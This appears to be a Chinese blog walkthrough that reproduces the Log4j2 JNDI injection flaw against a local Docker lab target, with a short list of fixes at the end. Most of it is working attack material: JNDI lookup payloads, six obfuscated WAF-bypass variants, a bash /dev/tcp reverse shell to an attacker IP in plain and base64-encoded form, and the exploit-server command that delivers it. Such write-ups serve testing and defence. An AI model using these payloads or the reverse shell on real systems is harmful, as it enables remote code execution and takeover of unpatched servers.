文章最后更新时间为:2021 年 12 月 14 日 18:17:34 Loading... ## **原理** 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。 https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA ## **影响版本** Apache Log4j 2.x <= 2.14.1 ## **poc** ${jndi:ldap://xxx.dnslog.cn/poc} waf绕过 1. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc} 2. ${${::-j}ndi:rmi://xxx.dnslog.cn/poc} 3. ${jndi:rmi://xxx.dnslog.cn/poc} 4. ${${lower:jndi}:${lower:rmi}://xxx.dnslog.cn/poc} 5. ${${lower:${lower:jndi}}:${lower:rmi}://xxx.dnslog.cn/poc} 6. ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.dnslog.cn/poc} ## **RCE利用** 靶机:http://192.168.223.129:8080/ #### 靶机搭建: 1.平台环境 http://vulfocus.fofa.so/ 2.本地搭建 > docker pull vulfocus/log4j2-rce-2021-12-09:latest > docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest #### 复现过程 先用dnslog测试一下 ![2021-12-14T09:29:58.png][1] ![2021-12-14T09:30:14.png][2] 1.构造一个LDAP或者RMI服务器。 [JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar][3] 构造payload: > bash -i > /dev/tcp/192.168.223.131/8566 0>&1 监听端口 > nc -lvnp 8566 到https://www.jackson-t.ca/runtime-exec-payloads.html转换一下 ![2021-12-14T10:09:01.png][4] > bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMjIzLjEzMS84NTY2IDA+JjE=}|{base64,-d}|{bash,-i} 开启工具 > java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMjIzLjEzMS84NTY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.223.131" > -C payload > -A 攻击机的IP ![2021-12-14T10:11:27.png][5] 这里有多个java版本的exp,如果不成功可以换个版本 ![2021-12-14T10:12:16.png][6] 执行成功,成功获取shell ![2021-12-14T10:12:46.png][7] ## **修复** 1. 升级最新版本 2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"; 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true" 4. 关闭应用的网络外连。 [1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3663888455.png [2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/4167555695.png [3]: https://www.lanzouy.com/iLyJTxlpxli [4]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3590640741.png [5]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/95741944.png [6]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/1582023542.png [7]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/530452763.png Last modification:December 14, 2021 © Allow specification reprint Support Appreciate the author Like 0 如果觉得我的文章对你有用,请随意赞赏